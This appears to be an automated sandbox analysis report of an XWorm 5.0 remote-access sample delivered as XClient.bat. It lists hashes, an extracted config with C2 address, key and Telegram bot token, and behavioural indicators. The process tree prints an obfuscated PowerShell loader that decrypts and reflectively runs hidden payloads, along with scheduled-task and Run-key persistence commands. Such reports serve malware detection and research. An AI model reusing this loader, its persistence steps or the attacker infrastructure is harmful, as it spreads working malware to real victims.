Analysis
-
max time kernel
140s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 18:07
Static task
static1
Behavioral task
behavioral1
Sample
XClient.bat
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
XClient.bat
Resource
win10v2004-20240508-en
General
-
Target
XClient.bat
-
Size
64KB
-
MD5
b9ba38c08e5f9113c31434ae324b3a67
-
SHA1
c5a03303b400dcac370989ba8e51e0b0a3c0622d
-
SHA256
b32ef974fa3195e1e88e290cb4b98f156e8ec3a5a053a8c781ecc2a8e47bf408
-
SHA512
a6960a62f1034441acce040366313c4e70563c4b57c8ca2fa30161e06f6489a86de7af52d3f5c5f69e806a8c0097ed7367e136070f40443cfe73945cb86d099c
-
SSDEEP
768:AO70rJOxpoeQhjCEqvimrMRLdJmmC5UXfs3NadfzteQCv/vFyVzgZpB+20JaaaTg:3CgSGNIfso7tqvFysTTdpePNKaAURYja
Malware Config
Extracted
xworm
5.0
83.143.112.35:7000
CyKBTjaY0aAqNzKT
-
Install_directory
%Temp%
-
install_file
Chrome.exe
-
telegram
https://api.telegram.org/bot6671364658:AAFSR01MD7rod9u5ExKsea5-2_kUtJR70Ks
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1120-47-0x0000021F6D970000-0x0000021F6D980000-memory.dmp family_xworm -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 15 1120 powershell.exe 26 1120 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Chrome.exepid process 2216 Chrome.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chrome = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Chrome.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exeChrome.exepid process 3688 powershell.exe 3688 powershell.exe 3132 powershell.exe 3132 powershell.exe 1120 powershell.exe 1120 powershell.exe 1120 powershell.exe 2216 Chrome.exe 2216 Chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3688 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeIncreaseQuotaPrivilege 3132 powershell.exe Token: SeSecurityPrivilege 3132 powershell.exe Token: SeTakeOwnershipPrivilege 3132 powershell.exe Token: SeLoadDriverPrivilege 3132 powershell.exe Token: SeSystemProfilePrivilege 3132 powershell.exe Token: SeSystemtimePrivilege 3132 powershell.exe Token: SeProfSingleProcessPrivilege 3132 powershell.exe Token: SeIncBasePriorityPrivilege 3132 powershell.exe Token: SeCreatePagefilePrivilege 3132 powershell.exe Token: SeBackupPrivilege 3132 powershell.exe Token: SeRestorePrivilege 3132 powershell.exe Token: SeShutdownPrivilege 3132 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeSystemEnvironmentPrivilege 3132 powershell.exe Token: SeRemoteShutdownPrivilege 3132 powershell.exe Token: SeUndockPrivilege 3132 powershell.exe Token: SeManageVolumePrivilege 3132 powershell.exe Token: 33 3132 powershell.exe Token: 34 3132 powershell.exe Token: 35 3132 powershell.exe Token: 36 3132 powershell.exe Token: SeIncreaseQuotaPrivilege 3132 powershell.exe Token: SeSecurityPrivilege 3132 powershell.exe Token: SeTakeOwnershipPrivilege 3132 powershell.exe Token: SeLoadDriverPrivilege 3132 powershell.exe Token: SeSystemProfilePrivilege 3132 powershell.exe Token: SeSystemtimePrivilege 3132 powershell.exe Token: SeProfSingleProcessPrivilege 3132 powershell.exe Token: SeIncBasePriorityPrivilege 3132 powershell.exe Token: SeCreatePagefilePrivilege 3132 powershell.exe Token: SeBackupPrivilege 3132 powershell.exe Token: SeRestorePrivilege 3132 powershell.exe Token: SeShutdownPrivilege 3132 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeSystemEnvironmentPrivilege 3132 powershell.exe Token: SeRemoteShutdownPrivilege 3132 powershell.exe Token: SeUndockPrivilege 3132 powershell.exe Token: SeManageVolumePrivilege 3132 powershell.exe Token: 33 3132 powershell.exe Token: 34 3132 powershell.exe Token: 35 3132 powershell.exe Token: 36 3132 powershell.exe Token: SeIncreaseQuotaPrivilege 3132 powershell.exe Token: SeSecurityPrivilege 3132 powershell.exe Token: SeTakeOwnershipPrivilege 3132 powershell.exe Token: SeLoadDriverPrivilege 3132 powershell.exe Token: SeSystemProfilePrivilege 3132 powershell.exe Token: SeSystemtimePrivilege 3132 powershell.exe Token: SeProfSingleProcessPrivilege 3132 powershell.exe Token: SeIncBasePriorityPrivilege 3132 powershell.exe Token: SeCreatePagefilePrivilege 3132 powershell.exe Token: SeBackupPrivilege 3132 powershell.exe Token: SeRestorePrivilege 3132 powershell.exe Token: SeShutdownPrivilege 3132 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeSystemEnvironmentPrivilege 3132 powershell.exe Token: SeRemoteShutdownPrivilege 3132 powershell.exe Token: SeUndockPrivilege 3132 powershell.exe Token: SeManageVolumePrivilege 3132 powershell.exe Token: 33 3132 powershell.exe Token: 34 3132 powershell.exe Token: 35 3132 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 1120 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exedescription pid process target process PID 2240 wrote to memory of 2368 2240 cmd.exe net.exe PID 2240 wrote to memory of 2368 2240 cmd.exe net.exe PID 2368 wrote to memory of 688 2368 net.exe net1.exe PID 2368 wrote to memory of 688 2368 net.exe net1.exe PID 2240 wrote to memory of 396 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 396 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 3688 2240 cmd.exe powershell.exe PID 2240 wrote to memory of 3688 2240 cmd.exe powershell.exe PID 3688 wrote to memory of 3132 3688 powershell.exe powershell.exe PID 3688 wrote to memory of 3132 3688 powershell.exe powershell.exe PID 3688 wrote to memory of 4776 3688 powershell.exe WScript.exe PID 3688 wrote to memory of 4776 3688 powershell.exe WScript.exe PID 4776 wrote to memory of 2780 4776 WScript.exe cmd.exe PID 4776 wrote to memory of 2780 4776 WScript.exe cmd.exe PID 2780 wrote to memory of 3220 2780 cmd.exe net.exe PID 2780 wrote to memory of 3220 2780 cmd.exe net.exe PID 3220 wrote to memory of 452 3220 net.exe net1.exe PID 3220 wrote to memory of 452 3220 net.exe net1.exe PID 2780 wrote to memory of 3252 2780 cmd.exe cmd.exe PID 2780 wrote to memory of 3252 2780 cmd.exe cmd.exe PID 2780 wrote to memory of 1120 2780 cmd.exe powershell.exe PID 2780 wrote to memory of 1120 2780 cmd.exe powershell.exe PID 1120 wrote to memory of 1604 1120 powershell.exe schtasks.exe PID 1120 wrote to memory of 1604 1120 powershell.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BtOk9w8o5AaasA3bULFmu6lzZU3YsXiJgOkhZu5Ls94='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5VSAd5R0G23+J6h8QdUPsw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JoEHY=New-Object System.IO.MemoryStream(,$param_var); $xGFrj=New-Object System.IO.MemoryStream; $jBGtG=New-Object System.IO.Compression.GZipStream($JoEHY, [IO.Compression.CompressionMode]::Decompress); $jBGtG.CopyTo($xGFrj); $jBGtG.Dispose(); $JoEHY.Dispose(); $xGFrj.Dispose(); $xGFrj.ToArray();}function execute_function($param_var,$param2_var){ $nZTyZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cFMlz=$nZTyZ.EntryPoint; $cFMlz.Invoke($null, $param2_var);}$DYtQC = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$host.UI.RawUI.WindowTitle = $DYtQC;$vVoJL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DYtQC).Split([Environment]::NewLine);foreach ($wnWAJ in $vVoJL) { if ($wnWAJ.StartsWith('rLSCSMNubfwqFDjMCNvM')) { $KKhqP=$wnWAJ.Substring(20); break; }}$payloads_var=[string[]]$KKhqP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_36_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_36.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_36.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_36.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BtOk9w8o5AaasA3bULFmu6lzZU3YsXiJgOkhZu5Ls94='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5VSAd5R0G23+J6h8QdUPsw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JoEHY=New-Object System.IO.MemoryStream(,$param_var); $xGFrj=New-Object System.IO.MemoryStream; $jBGtG=New-Object System.IO.Compression.GZipStream($JoEHY, [IO.Compression.CompressionMode]::Decompress); $jBGtG.CopyTo($xGFrj); $jBGtG.Dispose(); $JoEHY.Dispose(); $xGFrj.Dispose(); $xGFrj.ToArray();}function execute_function($param_var,$param2_var){ $nZTyZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cFMlz=$nZTyZ.EntryPoint; $cFMlz.Invoke($null, $param2_var);}$DYtQC = 'C:\Users\Admin\AppData\Roaming\Windows_Log_36.bat';$host.UI.RawUI.WindowTitle = $DYtQC;$vVoJL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DYtQC).Split([Environment]::NewLine);foreach ($wnWAJ in $vVoJL) { if ($wnWAJ.StartsWith('rLSCSMNubfwqFDjMCNvM')) { $KKhqP=$wnWAJ.Substring(20); break; }}$payloads_var=[string[]]$KKhqP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"5⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome.exe"6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\Chrome.exeC:\Users\Admin\AppData\Local\Temp\Chrome.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58f3393c68c469e2d1c92f7ee490b8489
SHA168013254b5a1d3f39d0ce88c7b7482fe7b8b9855
SHA2563a3ac14eac25092a16f327609ab86ae52028565b1639c76f571aee5822488c23
SHA512f71421b47408354c7b9f1ed5e6129aad398e6ecd6115ee044edea75976e015d83283ed3bbdbb3edafeac9caddfa53b551a734eb4a303014c4f95e8bdce1e67d4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Temp\Chrome.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1lcuiiya.zuy.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Windows_Log_36.batFilesize
64KB
MD5b9ba38c08e5f9113c31434ae324b3a67
SHA1c5a03303b400dcac370989ba8e51e0b0a3c0622d
SHA256b32ef974fa3195e1e88e290cb4b98f156e8ec3a5a053a8c781ecc2a8e47bf408
SHA512a6960a62f1034441acce040366313c4e70563c4b57c8ca2fa30161e06f6489a86de7af52d3f5c5f69e806a8c0097ed7367e136070f40443cfe73945cb86d099c
-
C:\Users\Admin\AppData\Roaming\Windows_Log_36.vbsFilesize
114B
MD5b41c44ccbb13db613bb95dd9a6ea3954
SHA132c826b5c1f85311494dba838f697bf50cd1943a
SHA2563419157a7f5541e31088ce4ff48c99c3c3c4d5ffed251650ff9a723ad5ccfa9c
SHA5129df865730a6e015e59b45750ee6ada5ae0c0636bb7d706c4bd23e56434a59553d1388a67fcbe3326668be08ba14e73f8abe6cd952c521ec3651f280ca8c36ba9
-
memory/1120-47-0x0000021F6D970000-0x0000021F6D980000-memory.dmpFilesize
64KB
-
memory/3688-12-0x00007FF8F5670000-0x00007FF8F6131000-memory.dmpFilesize
10.8MB
-
memory/3688-16-0x000001E4F2090000-0x000001E4F209E000-memory.dmpFilesize
56KB
-
memory/3688-15-0x000001E4F1CE0000-0x000001E4F1CE8000-memory.dmpFilesize
32KB
-
memory/3688-14-0x000001E4F4630000-0x000001E4F46A6000-memory.dmpFilesize
472KB
-
memory/3688-13-0x000001E4F45E0000-0x000001E4F4624000-memory.dmpFilesize
272KB
-
memory/3688-46-0x00007FF8F5670000-0x00007FF8F6131000-memory.dmpFilesize
10.8MB
-
memory/3688-0-0x00007FF8F5673000-0x00007FF8F5675000-memory.dmpFilesize
8KB
-
memory/3688-11-0x00007FF8F5670000-0x00007FF8F6131000-memory.dmpFilesize
10.8MB
-
memory/3688-10-0x000001E4F2040000-0x000001E4F2062000-memory.dmpFilesize
136KB